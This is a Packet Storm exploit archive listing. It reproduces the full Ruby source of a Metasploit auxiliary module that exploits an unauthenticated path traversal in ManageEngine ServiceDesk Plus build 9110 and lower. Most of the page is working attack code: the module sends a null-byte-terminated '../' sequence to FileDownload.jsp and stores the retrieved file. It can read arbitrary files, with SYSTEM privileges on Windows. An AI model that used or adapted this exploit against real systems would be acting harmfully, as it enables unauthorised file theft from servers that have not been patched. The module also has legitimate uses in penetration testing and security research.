exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine ServiceDesk Plus Path Traversal

ManageEngine ServiceDesk Plus Path Traversal
Posted Sep 1, 2024
Authored by xistence | Site metasploit.com

This Metasploit module exploits an unauthenticated path traversal vulnerability found in ManageEngine ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem with the same privileges as Support Center Plus is running. On Windows, files can be retrieved with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).

tags | exploit
systems | windows
SHA-256 | 8fad34674f4012b03f791e1ba3e184199e99b0489423de032233027145143f6c

ManageEngine ServiceDesk Plus Path Traversal

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner

def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine ServiceDesk Plus Path Traversal",
'Description' => %q{
This module exploits an unauthenticated path traversal vulnerability found in ManageEngine
ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem
with the same privileges as Support Center Plus is running. On Windows, files can be retrieved
with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).
},
'License' => MSF_LICENSE,
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
'References' =>
[
['URL', 'https://www.manageengine.com/products/service-desk/readme-9.1.html'],
],
'DisclosureDate' => '2015-10-03'
))

register_options(
[
Opt::RPORT(8080),
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ]),
OptString.new('TARGETURI', [true, 'The base path to the ServiceDesk Plus installation', '/']),
OptString.new('FILE', [true, 'The file to retrieve', '/windows/win.ini'])
])
end

def run_host(ip)
uri = target_uri.path
traversal = "../" * datastore['DEPTH']
filename = datastore['FILE']
filename = filename[1, filename.length] if filename =~ /^\//

vprint_status("Retrieving file #{datastore['FILE']}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"),
'vars_get' =>
{
'module' => 'support',
'fName' => "#{traversal}#{filename}\x00",
}
})

# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have retrieved the file either. Print the status code for debugging purposes.
# The "The File was not found" string is returned on a vulnerable environment but the file is not found.
# The "Loding domain list To login AD authentication or local Authentication" string is returned in the response on a fixed version (build 9111)
if res && res.code == 200
if res.body =~ /The File was not found/
vprint_error("Vulnerable server, but the file does not exist!")
elsif res.body =~ /Loding domain list To login AD authentication or local Authentication/
vprint_error("The installed version of ManageEngine ServiceDesk Plus is not vulnerable!")
else
p = store_loot(
'manageengine.servicedeskplus',
'application/octet-stream',
ip,
res.body,
filename
)
print_good("File saved in: #{p}")
end
else
vprint_error("Connection timed out")
end
end
end

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close